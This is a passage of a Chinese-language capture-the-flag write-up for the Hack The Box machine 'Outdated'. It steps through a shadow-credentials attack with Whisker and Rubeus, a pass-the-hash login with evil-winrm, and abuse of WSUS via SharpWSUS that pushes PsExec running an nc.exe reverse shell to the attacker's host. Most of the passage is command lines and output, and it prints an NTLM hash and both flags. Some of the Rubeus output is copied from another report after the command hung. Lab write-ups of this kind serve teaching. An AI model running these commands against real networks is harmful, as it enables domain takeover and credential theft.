PS C:\Users\btables\Desktop> .\w.exe list /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb
.\w.exe list /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Listing deviced for sflowers:
[*] No entries!
PS C:\Users\btables\Desktop> 

21、并没有上述的用户，那继续执行命令，添加一个用户

C:\Users\btables\Desktop>.\w.exe add /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb /password:shiyan10
.\w.exe add /domain:outdated.htb /target:sflowers /dc:DC.outdated.htb /password:shiyan10
[*] No path was provided. The certificate will be printed as a Base64 blob
[*] Searching for the target account
[*] Target user found: CN=Susan Flowers,CN=Users,DC=outdated,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID 0a0da7f4-d194-4f06-a7f9-e196850227fb
[*] Updating the msDS-KeyCredentialLink attribute of the target object
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] You can now run Rubeus with the following syntax:

Rubeus.exe asktgt /user:sflowers /certificate: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 /password:"shiyan10" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show

C:\Users\btables\Desktop>

22、这里需要运行的下一个命令

PS C:\Users\btables\Desktop> iwr http://10.10.16.7/Rubeus.exe -outfile r.exe
iwr http://10.10.16.7/Rubeus.exe -outfile r.exe
PS C:\Users\btables\Desktop> 


PS C:\Users\btables\Desktop> .\r.exe asktgt /user:sflowers /certificate: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 /password:"shiyan10" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show

23、这里不知道为什么，一直没有出现正确的回显内容，一直是卡顿状态，按照演练报告里，正常应该是出现下面的内容才对。

  ServiceName              :  krbtgt/outdated.htb
  ServiceRealm             :  OUTDATED.HTB
  UserName                 :  sflowers
  UserRealm                :  OUTDATED.HTB
  StartTime                :  7/19/2022 9:35:34 PM
  EndTime                  :  7/20/2022 7:35:34 AM
  RenewTill                :  7/26/2022 9:35:34 PM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  eS3rWh1yyu+COnBYg9XS8A==
  ASREP (key)              :  86CBEDAED5565CD4F39BE0D34BDCD874

[*] Getting credentials using U2U

  CredentialInfo         :
    Version              : 0
    EncryptionType       : rc4_hmac
    CredentialData       :
      CredentialCount    : 1
       NTLM              : 1FCDB1F6015DCB318CC77BB2BDA14DB5




SFLOWERS@OUTDATED.HTB


net user sflowers /domain

C:\Users\Administrator\Desktop>net user sflowers
net user sflowers
User name                    sflowers
Full Name                    Susan Flowers
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/20/2022 11:04:09 AM
Password expires             Never
Password changeable          6/21/2022 11:04:09 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   6/15/2022 10:48:27 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*WSUS Administrators  
Global Group memberships     *Domain Users         
The command completed successfully.


C:\Users\Administrator\Desktop>


C:\Users\Administrator\Desktop>net user sflowers /domain
net user sflowers /domain
User name                    sflowers
Full Name                    Susan Flowers
Comment                      
User's comment               
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            6/20/2022 11:04:09 AM
Password expires             Never
Password changeable          6/21/2022 11:04:09 AM
Password required            Yes
User may change password     No

Workstations allowed         All
Logon script                 
User profile                 
Home directory               
Last logon                   6/15/2022 10:48:27 PM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use*WSUS Administrators  
Global Group memberships     *Domain Users         
The command completed successfully.


C:\Users\Administrator\Desktop>

24、那不管了，参照演练报告，获取第一个flag信息

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -u sflowers -i dc.outdated.htb -H 1FCDB1F6015DCB318CC77BB2BDA14DB5
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sflowers\Documents> dir
*Evil-WinRM* PS C:\Users\sflowers\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\sflowers\Desktop> dir


    Directory: C:\Users\sflowers\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         8/3/2022   4:19 PM         514472 PsExec64.exe
-ar---       10/10/2024   7:53 AM             34 user.txt


*Evil-WinRM* PS C:\Users\sflowers\Desktop> type user.txt
754c1b43f8b51944615929b25c7208c7
*Evil-WinRM* PS C:\Users\sflowers\Desktop> 

0x02 系统权限获取

25、识别 WSUS，注册表项HKLM:\software\policies\microsoft\windows\WindowsUpdate将显示正在使用的 WSUS 服务器。从客户端：

C:\Users\Administrator\Desktop>powershell
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\Administrator\Desktop> Get-ItemProperty HKLM:\software\policies\microsoft\windows\WindowsUpdate
Get-ItemProperty HKLM:\software\policies\microsoft\windows\WindowsUpdate


SetActiveHours                               : 1
ActiveHoursStart                             : 0
ActiveHoursEnd                               : 23
AcceptTrustedPublisherCerts                  : 1
ExcludeWUDriversInQualityUpdate              : 1
DoNotConnectToWindowsUpdateInternetLocations : 1
WUServer                                     : http://wsus.outdated.htb:8530
WUStatusServer                               : http://wsus.outdated.htb:8530
UpdateServiceUrlAlternate                    : 
PSPath                                       : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies
                                               \microsoft\windows\WindowsUpdate
PSParentPath                                 : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\software\policies
                                               \microsoft\windows
PSChildName                                  : WindowsUpdate
PSDrive                                      : HKLM
PSProvider                                   : Microsoft.PowerShell.Core\Registry



PS C:\Users\Administrator\Desktop> 

26、WSUS 仅运行已签名的 Microsoft 二进制文件。由于我没有很好的方法来获取 MS 签名证书，因此我必须使用一些合法的工具。本文建议使用 Sysintenals 工具PSExec。我将下载Sysinternals，复制PsExec.exe到我的网络服务器，然后上传它：

Evil-WinRM* PS C:\Users\sflowers\Desktop> upload SharpWSUS.exe sw.exe
                                        
Info: Uploading /home/kali/Desktop/SharpWSUS.exe to C:\Users\sflowers\Desktop\sw.exe
                                        
Data: 65536 bytes of 65536 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\sflowers\Desktop> upload PsExec64.exe \programdata\ps.exe
                                        
Info: Uploading /home/kali/Desktop/PsExec64.exe to C:\Users\sflowers\Desktop\programdata\ps.exe
                                        
Data: 499924 bytes of 499924 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\sflowers\Desktop> copy C:\Users\sflowers\Desktop\programdata\ps.exe .
*Evil-WinRM* PS C:\Users\sflowers\Desktop> dir


    Directory: C:\Users\sflowers\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       10/10/2024   9:58 AM                programdata
-a----       10/10/2024   9:58 AM         374944 ps.exe
-a----         8/3/2022   4:19 PM         514472 PsExec64.exe
-a----       10/10/2024   9:57 AM          49152 sw.exe
-ar---       10/10/2024   7:53 AM             34 user.txt


*Evil-WinRM* PS C:\Users\sflowers\Desktop> upload nc.exe
                                        
Info: Uploading /home/kali/Desktop/nc.exe to C:\Users\sflowers\Desktop\nc.exe
                                        
Data: 79188 bytes of 79188 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\Users\sflowers\Desktop>

27、上传完后，执行利用

*Evil-WinRM* PS C:\Users\sflowers\Desktop> .\sw.exe create /payload:"C:\Users\sflowers\Desktop\ps.exe" /args:" -accepteula -s -d C:\Users\sflowers\Desktop\nc.exe -e cmd.exe 10.10.16.7 445" /title:"CVE-2022-30190"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: ps.exe
[*] Payload Path: C:\Users\sflowers\Desktop\ps.exe
[*] Arguments:  -accepteula -s -d C:\Users\sflowers\Desktop\nc.exe -e cmd.exe 10.10.16.7 445
[*] Arguments (HTML Encoded):  -accepteula -s -d C:\Users\sflowers\Desktop\nc.exe -e cmd.exe 10.10.16.7 445

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent

ImportUpdate
Update Revision ID: 32
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 33
PrepareXMLBundletoClient
DeploymentRevision

[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:c5687e3e-43ad-4527-8575-033151b0a584 /computername:Target.FQDN /groupname:"Group Name"

[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:c5687e3e-43ad-4527-8575-033151b0a584 /computername:Target.FQDN

[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:c5687e3e-43ad-4527-8575-033151b0a584 /computername:Target.FQDN /groupname:"Group Name"

[*] Create complete

*Evil-WinRM* PS C:\Users\sflowers\Desktop> 

*Evil-WinRM* PS C:\Users\sflowers\Desktop> .\sw.exe approve /updateid:c5687e3e-43ad-4527-8575-033151b0a584 /computername:dc.outdated.htb /groupname:"CriticalPatches"

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Approve Update

Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: CriticalPatches
Added Computer To Group
Approved Update

[*] Approve complete

*Evil-WinRM* PS C:\Users\sflowers\Desktop> 

28、到这里就获取到了管理员的shell了

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lvnp 445
listening on [any] 445 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.175] 62202
Microsoft Windows [Version 10.0.17763.1432]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

29、获取最终的flag信息

C:\Windows\system32>cd C:\Users\Administrator
cd C:\Users\Administrator

C:\Users\Administrator>cd Desktop
cd Desktop

C:\Users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 2170-25D8

 Directory of C:\Users\Administrator\Desktop

08/13/2022  09:40 PM    <DIR>          .
08/13/2022  09:40 PM    <DIR>          ..
10/10/2024  07:53 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   8,094,789,632 bytes free

C:\Users\Administrator\Desktop>type root.txt
type root.txt
efaf3915c9f3ba9003ca6952cfc0d359

C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/490